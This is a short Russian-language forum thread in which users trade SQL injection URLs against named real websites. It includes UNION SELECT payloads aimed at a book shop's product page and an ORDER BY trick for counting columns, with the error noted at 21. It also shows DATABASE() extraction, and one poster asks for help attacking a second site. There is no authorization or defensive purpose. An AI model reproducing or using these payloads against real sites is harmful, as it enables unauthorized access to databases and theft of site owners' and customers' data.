http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*

[flame]
в этом случае проще количество столбцов перебирать вот таким способом:
__http://site.com/index.php?Lev=product_info&id=-1'+order by x/*
x = 1 ... n
Если при x = n вылетает ошибка то количество столбцов n-1
В этом случае ошибка вылетает при х=21
http://kniga.com.ua/index.php?Lev=product_info&id=-883' order by 21/*
[/flame]
ЗЫ: сорри за флейм просто не удержался и запостил когда увидел такую длинную ссылку

А не подскажете как узнать имя таблицы через sql-injection? На примере с www.kinga.com.ua.
Например узнать имя БД : вместо null подставить DATABASE(). Есть ли в MySQL такие средства?

http://kniga.com.ua/index.php?Lev=product_info&id=-883'+union+select+1,2,DATABASE(),4,5,6,7,8,9,10,11 ,12,13,14 ,15,16,17,18,19,20/*

Народ, может и не тут пишу, но нужно узнать возмжна ли sql-injection на сайте http://www.e-d.lt/?ru=1117522100' и если можно пример, для меня это очень важно.

а вопрос то кажется несложным, чтож так никто и не знает?